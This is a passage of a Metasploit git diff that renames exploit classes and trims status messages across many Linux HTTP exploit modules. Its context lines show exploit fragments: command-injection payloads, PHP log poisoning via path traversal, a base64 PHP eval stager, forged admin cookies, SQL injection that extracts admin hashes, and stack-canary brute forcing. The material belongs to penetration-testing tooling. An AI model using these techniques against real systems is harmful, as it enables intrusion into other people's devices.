b/modules/exploits/linux/http/mutiny_frontend_upload.rb index bd9cf31035..a80a737cb1 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options") end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable Payload file") + print_status("Uploading executable Payload file") elf = payload.encoded_exe elf_location = "/tmp" elf_filename = "#{rand_text_alpha_lower(8)}.elf" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "m", jsp_filename), diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb index e4c2587641..0d0c2e5fc9 100644 --- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index 6052481e8b..41d72de2b9 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 9fce52a1a5..9a4bc77e7a 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")" - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_payload(my_payload) end diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index be5ae4c9c3..2add096256 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Exploit::Remote::Tcp @@ -85,7 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -213,16 +213,16 @@ class Metasploit4 < Msf::Exploit::Remote else if not datastore['CANARY'] == 0xffffffff - print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY']) + print_status("Using 0x%08x as stack canary" % datastore['CANARY']) canary = datastore['CANARY'] else - print_status("#{peer} - Searching for stack canary") + print_status("Searching for stack canary") canary = find_canary if canary.nil? || canary == 0x00000000 fail_with(Failure::Unknown, "#{peer} - Unable to find stack canary") else - print_good("#{peer} - Canary found: 0x%08x\n" % canary) + print_good("Canary found: 0x%08x\n" % canary) end end @@ -246,11 +246,11 @@ class Metasploit4 < Msf::Exploit::Remote # First byte of the canary is already known canary = "\x00" - print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00) + print_status("Assuming byte 0 0x%02x" % 0x00) # We are going to bruteforce the next 3 bytes one at a time 3.times do |c| - print_status("#{peer} - Bruteforcing byte #{c + 1}") + print_status("Bruteforcing byte #{c + 1}") 0.upto(255) do |i| data = random_chunk_size(1024) @@ -259,7 +259,7 @@ class Metasploit4 < Msf::Exploit::Remote data << i.chr unless send_request_fixed(data).nil? - print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i) + print_good("Byte #{c + 1} found: 0x%02x" % i) canary << i.chr break end diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 782cd0a2e1..41d9e038ea 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/' @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = Rex::Text.uri_encode("&#{payload.raw}&") # send payload - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/admin/system.html', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /System : Network Setup<\/title>/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ fail_with(Failure::NoAccess, 'Authentication failed') else diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 110c774531..0b4b436f0a 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - print_status("#{peer} - Trying to escalate privileges to root") + print_status("Trying to escalate privileges to root") [ # ignore SIGHUP so the server doesn't kill our root shell "trap '' HUP", @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway") + print_status("Trying to detect Pandora FMS Remote Gateway") res = send_request_cgi({ 'method' => 'GET', @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") - print_good("#{peer} - Pandora FMS Remote Gateway Detected!") + print_good("Pandora FMS Remote Gateway Detected!") return Exploit::CheckCode::Detected end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 070c50dd90..aed531b229 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") version = nil res = send_request_cgi({ @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless version.nil? - vprint_status("#{peer} - Pandora FMS #{version} found") + vprint_status("Pandora FMS #{version} found") if Gem::Version.new(version) <= Gem::Version.new('5.0SP2') return Exploit::CheckCode::Appears end @@ -120,13 +120,13 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_status("#{peer} - Extracted auto login password (#{password})") + print_status("Extracted auto login password (#{password})") else - print_error("#{peer} - No auto login password has been defined!") + print_error("No auto login password has been defined!") return false end - print_status("#{peer} - Attempting to authenticate using (admin:#{password})") + print_status("Attempting to authenticate using (admin:#{password})") # Attempt to login using login hash password res = send_request_cgi({ 'method' => 'POST', @@ -146,17 +146,17 @@ class Metasploit3 < Msf::Exploit::Remote def auth_succeeded?(res) if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') - print_status("#{peer} - Successfully authenticated!") - print_status("#{peer} - Attempting to retrieve session cookie") + print_status("Successfully authenticated!") + print_status("Attempting to retrieve session cookie") @cookie = res.get_cookies if @cookie.include?('PHPSESSID') - print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}") + print_status("Successfully retrieved session cookie: #{@cookie}") return true else - print_error("#{peer} - Error retrieving cookie!") + print_error("Error retrieving cookie!") end else - print_error("#{peer} - Authentication failed!") + print_error("Authentication failed!") end false @@ -177,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]") + print_good("Extracted admin password hash, unsalted md5 - [ #{password} ]") else - print_error("#{peer} - Unable to extract password hash!") + print_error("Unable to extract password hash!") return false end end @@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote if match result = match[1] else - print_error("#{peer} - SQL injection failed") + print_error("SQL injection failed") end end result @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/ hash = $1 else - print_error("#{peer} - Could not extract hash from response!") + print_error("Could not extract hash from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/ hash2 = $1 else - print_error("#{peer} - Could not extract hash2 from response!") + print_error("Could not extract hash2 from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -245,11 +245,11 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/ real_directory = $1 else - print_error("#{peer} - Could not extract real_directory from response!") + print_error("Could not extract real_directory from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end else - print_error("#{peer} - Could not identify upload form!") + print_error("Could not identify upload form!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -266,7 +266,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"') post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"') - print_status("#{peer} - Attempting to upload payload #{@payload_name}...") + print_status("Attempting to upload payload #{@payload_name}...") res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?("Upload correct") register_file_for_cleanup(@payload_name) - print_status("#{peer} - Successfully uploaded payload") + print_status("Successfully uploaded payload") else fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -290,24 +290,24 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # First try to authenticate using default or user-supplied credentials - print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") + print_status("Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") auth = authenticate unless auth - print_status("#{peer} - Attempting to extract auto login hash via SQLi") + print_status("Attempting to extract auto login hash via SQLi") auth = login_hash end unless auth - print_status("#{peer} - Attempting to extract admin password hash with SQLi") + print_status("Attempting to extract admin password hash with SQLi") extract fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!") end - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") upload - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'images', @payload_name), diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 870ee7fdc1..c961f9bb31 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb index d9cab6a7a3..36c1176d0e 100644 --- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb +++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 94a67de146..935f34a251 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index 10111bb598..629e89b1ba 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index bcb9e18bf2..2422a19bb5 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index d6a748c00f..281239a922 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index c9d90752ab..4cf8418b8c 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 8806f177b8..059d0156d9 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -82,13 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 95759912b2..e3ec94f6bd 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -109,7 +109,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', @@ -129,13 +129,13 @@ class Metasploit4 < Msf::Exploit::Remote # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) @@ -146,7 +146,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', @@ -173,8 +173,8 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +191,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +203,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), @@ -227,10 +227,10 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" @@ -250,20 +250,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', @@ -281,7 +281,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +325,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 38434f957a..73e08f8e2c 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit buffer = self.send(target[:callback]) - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_close_window_request(buffer, payload.encoded) end diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index d06f0ab552..a8559df320 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb index f34b35bbf2..01a4a6e9f3 100644 --- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index f3e0af32f5..3da6b67212 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = "subnet=" post_data << "\";" + payload.raw + ";#" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably # something is wrong if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 5eef56db31..6ced3d32a4 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(after_filename, "application/octet-stream", nil, "form-data; name=\"after_filename\"") post_data.add_part("<?php #{payload.encoded} ?>", "image/gif", nil, "form-data; name=\"new_image\"; filename=\"#{payload_name}\"") - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote # of the default file, we assume we uploaded the malicious # file successfully if not res or res.code != 200 or res.body !~ /temp.php/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index ca0376af14..e2080dcb13 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'WfsDelay' => 300, #5 minutes - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote php = %Q|<?php #{payload.encoded} ?>| # Inject PHP to log - print_status("#{peer} - Injecting PHP to log...") + print_status("Injecting PHP to log...") res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{php}" @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote # Use the directory traversal to load the PHP code # access_log takes a long time to retrieve - print_status("#{peer} - Loading PHP code..") + print_status("Loading PHP code..") send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' }) - print_status("#{peer} - Waiting for a session, may take some time...") + print_status("Waiting for a session, may take some time...") select(nil, nil, nil, 1) diff --git a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb index dab96c8f57..06c63e82c8 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 46fe21a41f..fcac6a43c6 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = 